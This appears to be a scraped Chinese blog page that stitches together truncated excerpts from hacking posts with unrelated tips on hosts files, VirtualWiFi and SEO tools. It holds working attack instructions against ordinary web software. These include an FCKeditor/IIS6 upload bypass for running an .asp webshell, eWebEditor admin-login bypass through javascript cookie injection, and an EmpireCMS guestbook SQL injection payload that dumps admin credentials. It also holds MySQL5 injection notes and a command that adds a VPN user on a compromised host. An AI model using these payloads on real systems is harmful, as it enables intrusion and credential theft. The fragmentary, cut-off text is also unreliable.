来源:T00LS.Net 很久以前t00ls核心群讨论出来的。 由于Fckeditor对第一次上传123.asp;123.jpg 这样的格式做了过滤。也就是IIS6解析漏洞。 上传第一次。被过滤为123_asp;123.jpg 从而无法运行。 但是第2次上传同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已经存在。 文件名被命名为123.asp;123(1).jpg 123.asp;123(2).jpg这样的编号方式。 所以。IIS6的漏洞继续执行了。。。 然后通过抓包。获取上传后地址即可。。 剩下看大家灵活运用了。。。

cmd下添加vpn用户 netsh ras set user 你的用户名 permit CMD下如何建立VPN 的方法 1.前提 服务里 windows防火墙停止（或者麻烦点可以把router协议，端口1723配进去） 远程注册表服务必须开启 server服务必须开启 router路由服务必须开启 两块以上网卡的win2000做vpn很方便，添加nat协议后，客户端拨入，能够使用远程网络连接internet。 使得部分客户端可提高网络速度，并达到代理的作用。 一块网卡的winxp，win2003做类似的vpn仍然很方便，nat协议添加后，再添加两个接口，

XMarks是一个我非常喜爱的书签同步插件，经常使用多台电脑的我，非常需要让我的书签保持同步。然而，任何一个优秀的国外服务必然会被或者曾经被天朝墙奸的，这是一个恒定的道理。这次某墙终于对FireFox上最棒的书签同步插件——Xmarks起了色心。也不知道是XMarks太性感了还是它触动了墙的那根神经，反正就那样了，导致无数人的书签无法同步，非常的不方便，下面提供一个简单的解决方法…… 下面提供一组最新的hosts IP。通过手动修改hosts配置，将这组IP加入到host文件(C:\Windows\System32\Driver

http://hi.baidu.com/wodingdong/blog/item/d51bb1ce35667530b700c8d4.html      早就该写这篇文章了的，拖到现在很不好意思。 2009年07月21日 22时54分我的博客里有一篇私有的文章就一句话”今天打

arpscan.exe是一个基于wpcap.lib开发网络扫描工具 所以先要安装winpcap驱动 它可以快速扫描网段所有存活的主机 包括安装了防火墙的主机，道理很简单，arp协议比较底层 防火墙不可能过滤掉正常的arp协议请求 还可以快速检查整个子网里是否存在嗅探器以及使用arp欺骗技术的病毒 并精确的找到对应的ip地址及mac地址的主机 程序下载： http://tmdnet.nothave.com/bin/arpscan.exe winpcap驱动 http://tmdnet.nothave.com/tmp/WinPcap_3_1.exe C:\>arpscan.exe

来自：影子鹰 漏洞文件download.php  PHP代码 <?php    require dirname(__FILE__).'/include/common.inc.php';

随着信息技术的发展，越来越多的人开始使用便捷的无线路由器(AP)组建家庭局域网。当你发现周围有多个AP可以连接的时候，是不是会想：如果能同时连接上多个AP，让多个AP为下载服务提升下载速度该多好啊！其实借助软件是可以实现的，下面就向大家介绍具体方法。 　　我们要借助的软件名叫VirtualWiFi，这款软件能虚拟出多块无线网卡从而达到同时连接多个AP的目的。 下载地址：

php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道，在这里我说说利用方法: 1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必 须是出错的时候，然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=

来源普瑞斯特 深灰丢出来的0day. 找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1 出来的是帝国CMS的留言本,在姓名处写:縗\ 联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* 提交后爆出账号密码

Mysql5和之前的版本有很多不同的地方，灵活的运用其特性可以在入侵的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没有写清楚的部分表达出来，你看明白这个文章后也许你会发现，原来mysql5也可以像mssql一样注射。 一、原理分析 我们先看看mysql5比之前增加的系统数据库information_schema的结构，它是用来存储数据库系统信息的 mysql> use information_schema; Database changed mysql> sh

破解MSSQL的HASH密码 原文名称 :Microsoft SQL Server Passwords (Cracking the password hashes) 原文地址 :http://www.ngssoftware.com/papers/cracking-sql-passwords.pdf 作者 :David Litchfield <david@ngssoftware.com> Term : FreeXploiT Author : ALLyeSNO Date : 2005-3-25 翻译:ALLyeSNO <shellget@hotmail.com> http://blog.csdn.net/freexploit 参考文章：flashsky《浅谈SQL SERVER数据库口令的脆弱性》 SQL服务器是怎样储存密码的？ SQL服

影响版本：3.0 信息来源：零客网安

这套系统有N年版,一般的政府、学校和企事业单位用得多, 特证: 显示新闻News_View.asp?NewsID= 登陆login.asp?id=3,最主要的特证是用的一个有一个EDIT目录，下面的数据库是用的db/#ewebeditor.asp 以上特证只要中二个就基本可以肯定是这套系统 漏洞：这套系统原来有N多漏洞，但经过改进，现在主要的问题是COOKIES注入和列目录问题 具体的代码我就讲了，直接讲利用 第一板斧： 老版中存在一个后台COOKIES注入 直接打开登陆后台，然后在地址栏输入 javascript:alert(docume

Google Adwords关键字工具:  Google Adwords Keyword Tool SEObook关键字列表发生器:  SEObook Keyword List Generator 微软的Ad Center实验室研究关键字工具:

加为好友

互联网 所有空间 本空间

已有人次访问本空间   什么是RSS？

pv_state	bnzm5270
aiverforu	bbsggy
vodby	bester123
打劫股市	wodingdong